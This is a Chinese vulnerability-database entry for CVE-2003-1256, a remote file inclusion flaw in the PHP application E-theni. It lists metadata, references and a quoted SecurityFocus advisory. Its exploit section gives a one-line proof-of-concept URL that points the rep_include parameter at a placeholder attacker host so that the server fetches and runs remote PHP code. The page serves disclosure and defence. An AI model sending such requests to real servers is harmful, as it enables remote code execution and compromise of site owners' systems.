E-theni远程包含命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107150 漏洞类型 设计错误
发布时间 2003-01-06 更新时间 2007-07-03
CVE编号 CVE-2003-1256 CNNVD-ID CNNVD-200312-364
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/22293
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-364
|漏洞详情
E-theni的aff_liste_langue.php存在漏洞。远程攻击者可以通过修改rep_include参数以引用远程web服务器上含para_langue.php的URL来执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/6970/info

E-theni may allow inclusion of malicious remote files. This is due to remote users being able to influence the include path of an external file ('para_langue.php') referenced by the 'aff_liste_langue.php' script. This could result in arbitrary command execution. 

http://www.example.com/admin_t/include/aff_liste_langue.php?rep_include=http://<attacker_site>/para_langue.php
|参考资料
http://www.iss.net/security_center/static/11013.php※http://www.securityfocus.com/bid/6970※http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0009.html※http://www.securityfocus.com/archive/1/305381※※